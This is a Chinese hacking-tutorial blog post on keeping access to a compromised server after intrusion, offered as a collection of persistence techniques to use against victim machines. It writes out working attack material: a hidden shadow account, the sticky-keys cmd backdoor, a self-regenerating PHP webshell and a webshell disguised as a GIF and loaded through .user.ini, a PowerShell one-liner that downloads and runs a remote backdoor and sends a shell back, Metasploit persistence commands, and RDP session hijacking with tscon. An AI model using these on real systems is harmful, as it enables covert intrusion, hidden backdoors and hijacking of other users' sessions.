后渗透之维护权限

congtoucongtou 渗透技巧 6年前
7.49W 0
华盟原创文章投稿奖励计划

0x00:简介

何为“后渗透”?就是获取到受害者服务器的权限后,再继续对受害者服务器进行长期攻击或者信息获取的一种持续性手段。常见的手段有,后门、影子账户、会话劫持等等。

0x01:实验

一、影子账户

原理:创建一个跟普通用户一样的用户,但是只能在注册表中才能查看到的用户。 

net user luomiweixiong$ 123456 /addnet user

需要改动一下注册表,详细可以百度一下


二、shift后门

原理:将按5下shift时调用的“粘滞键”替换为“CMD”
将 C:WINDOWSsystem32dllcachesethc.exe删除,这个文件夹中放着缓存,如果不 删除就会自动变回去
找到C:WINDOWSsystem32cmd.exe 将其复制并将名称更改为 sethc.exe,放回文件夹中
这次按5次shift键就可以打开cmd了

后渗透之维护权限

三、反弹加入自启(鸡肋)

1、NC反弹

2、Bash反弹

3、perl反弹

4、Python反弹

5、PHP反弹

6、等等

将反弹的脚本写入到启动项里,当受害者启动服务器时,自动反弹shell。弊端就是要一直监听,还要有公网的IP。

四、隐藏后门文件

1、将木马文件属性改为“隐藏”


后渗透之维护权限

2、将木马名字进行伪装处理,伪装成系统文件或者报错文件。修改时间跟系统文件时间类似。

3、利用循环不死马(举栗子) 


<?phpset_time_limit(0);ignore_user_abort(1);unlink(__FILE__);while(1){file_put_contents('phpinf0.php','<?php $a=array($_REQUEST["kk"]=>"3");$b=array_keys($a)[0];eval($b);?>');sleep(8);}?>

说明:此脚本会每8秒不断的向服务器生成一个“phpinf0.php”的一句话木马.
五、利用.user.ini文件自动包含木马文件
在“.user.ini”文件写入 

auto_prepend_file=luomiweixiong.gif

在“luomiweixiong.gif”文件写入一句话木马
 

<!–?php $a = “a”.”s”.”s”.”e”.”r”.”t”;$a($_POST[“kk”]); ?–>

利用成功前提下必须有以下三个文件,
1、PHP的正常文件
2、修改后.user.ini文件
3、luomiweixiong.gif木马


后渗透之维护权限


后渗透之维护权限

说明:在限制了PHP文件上传的条件下,上传ini文件,再进行文件包含拿shell.
六、Powershell权限维持
参考此PowerShell脚本https://github.com/re4lity/Schtasks-Backdoor
利用代码: 

powershell.exe-exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://192.168.124.25/Invoke-taskBackdoor.ps1');Invoke-Tasksbackdoor-method nccat -ip 192.168.124.14 -port 666 -time 2"

说明:
1、192.168.124.25为受害者IP,前提是要把PowerShell脚本放到受害者服务器能访问到的根路径。
2、192.168.124.14为接收反弹回来的IP,可用NC监听反弹回来的shell
七、metasploit权限维持
1、Persistence模块
前提是利用MSF获取到了对方的会话 

run persistence -U -i 12 -p 6666 -r 192.168.124.14

说明
-i  目标自动回连时间-p  设置目标反向连接的端口-r  设置目标反向连接的ip地址-U  设置目标自启动
加入自启动后,就算受害者机器再次启动也能弹回shell
2、metsvc 模块前提是利用MSF获取到了对方的会话

run metsvc -A

说明:
-A 自动启动一个匹配的 multi/handler 以连接到该服务
该模块是在受害者服务器开启了一个“Meterpreter”服务
下次攻击者可以利用metsvc_bind_tcp监听模块就可以再次获取到shell监听端口为31337
八、会话劫持
说明:RDP会话劫持是在不知道另一用户密码的条件下进行切换用户登录 

query usersc create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#4"net start sesshijack

后渗透之维护权限

后渗透之维护权限

0x02:题外话


以上这些只是思路。未必能成。

维护权限还有很多种方法,我这里只是举几个栗子🌰。

学生不才,总结不精,望良师指导


本文来源于微信公众号: 洛米唯熊

维护权限(1),后渗透(4),黑客自学教程(39),渗透测试(167),黑客技术(189)
本文原创,作者:congtou,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/240890.html
congtou官方
congtou

3.19K篇文章 158.50M总阅读量

相关文章

发表评论